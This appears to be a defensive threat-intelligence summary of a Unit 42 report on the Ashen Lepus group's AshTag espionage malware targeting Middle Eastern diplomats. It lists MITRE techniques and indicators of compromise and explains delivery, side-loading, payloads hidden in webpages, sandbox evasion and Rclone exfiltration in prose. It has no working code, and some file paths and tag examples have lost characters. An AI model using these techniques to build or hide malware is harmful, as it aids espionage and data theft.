Threat Research

Hamas-Affiliated Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite

Unit42
Hamas-Affiliated Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite

Ashen Lepus conducted a long-running espionage campaign across Middle Eastern government and diplomatic targets, evolving its tooling and OpSec to deliver a new modular .NET malware suite named AshTag that uses DLL side-loading, in-memory execution, and encrypted payloads embedded in benign webpages. The group shifted C2 infrastructure to legitimate-looking subdomains, staged hands-on data theft (including using Rclone for exfiltration), and persisted via scheduled tasks while continuing activity throughout the Israel-Hamas conflict. #AshenLepus #AshTag

Keypoints

  • Ashen Lepus (aka WIRTE) deployed a new modular .NET malware suite called AshTag, replacing prior test-phase tooling with a fully featured backdoor capable of file exfiltration, command execution and in-memory module execution.
  • The infection chain begins with lure-based decoy PDFs and RAR archives; a user-run binary side-loads a malicious loader (e.g., netutils.dll) that opens a decoy PDF and retrieves staged payloads from C2 webpages.
  • Loaders and stages hide payloads within HTML tags (e.g., ,
    ), use Base64 and XOR/AES decryption, and search for commented tag names to locate embedded modules.
  • Operators improved OpSec by registering API/auth subdomains under legitimate domains (technology/medical themes) and geofencing servers to evade automated analysis and blend with benign traffic.
  • AshenStager injects decoded payloads into memory and sets persistence via scheduled tasks executed by svchost.exe; some injection features remain under development in current samples.
  • After automated compromise, actors performed hands-on activity: staging diplomacy-related documents in C:UsersPublic, harvesting emails, and exfiltrating data using the legitimate Rclone tool to attacker-controlled servers.
  • Unit 42 mapped infrastructure, file names and encryption artifacts to prior Ashen Lepus activity and provided telemetry-based protections via WildFire, URL/DNS filtering, Cortex XDR and XSIAM.

MITRE Techniques

  • [T1204.002 ] User Execution: Malicious File – Initial compromise via lure and malicious archive where “A targeted victim clicks the binary file, expecting to open a document.”
  • [T1574.001 ] DLL Side-Loading – Loaders are delivered by side-loading malicious DLLs: “the binary side-loads the first malicious loader (netutils.dll)”
  • [T1053.005 ] Scheduled Task/Job – Persistence is established via scheduled tasks: “AshenStager also sets its persistence via a scheduled task, executed by svchost.exe.”
  • [T1055 ] Process Injection – In-memory execution and injection of decoded payloads: “After extracting the payload, AshenStager decodes, parses and injects the payload in memory.”
  • [T1071.001 ] Application Layer Protocol: Web Protocols (HTTP/S) – C2 communication over HTTP requests: “AshenStager is designed to send an HTTP request to its C2 server.”
  • [T1140 ] Deobfuscate/Decode Files or Information – Stages use Base64 and XOR/AES to hide payloads in HTML and JSON: “the stager receives a Base64-encoded JSON file” and payloads are decrypted using AES/XOR keys.
  • [T1566.001 ] Phishing: Spearphishing Attachment – Lures delivered as decoy PDFs and archives to trick users into running binaries: “benign PDF decoy file that guides targets to a file-sharing service to download a RAR archive containing a malicious payload.”
  • [T1497.001 ] Virtualization/Sandbox Evasion – C2 performs environment checks to avoid sandboxes by verifying geolocation and User-Agent strings: “the server checks the victim’s geolocation, and checks specific User-Agent strings in the traffic that are unique to the malware.”
  • [T1041 ] Exfiltration Over C2 Channel – Staged documents were exfiltrated using a legitimate tool to attacker servers: “To exfiltrate the staged files, Ashen Lepus downloaded the Rclone open-source tool, transferring the data to an attacker-controlled server.”

Indicators of Compromise

  • [SHA256 Hashes ] Malware sample hashes (multiple sample categories) – 3502c9e4…768, f554c437…31bc, and 17 more hashes for loaders, stagers and modules.
  • [Domains ] C2, backdoor and exfiltration domains used in the campaign – api.healthylifefeed[.]com, forum.techtg[.]com, and 10 other domains observed (e.g., api.softmatictech[.]com, api.technology-system[.]com).
  • [File names ] Loader and decoy file names used in the chain – Document.pdf, wtsapi32.dll (also seen as dwampi.dll) used for side-loading and decoys.
  • [Scheduled Tasks ] Persistence mechanisms created on host – C:WindowsSystem32TasksWindowsWindowsDefenderUpdateWindows Defender Updater; C:WindowsSystem32TasksAutomatic Windows Update.
  • [Encryption Keys / Nonce ] Hardcoded AES keys and nonces found in binaries – Key: {9a 20 51 98 … ea 8b}, Nonce: {44 ba 8c … ea 8b}; also a generic default key/nonce pair in variant 2.
  • [Tools ] Legitimate utilities abused for activity and exfiltration – Rclone (used to transfer stolen files), and svchost.exe used to run scheduled tasks.

Read more: https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/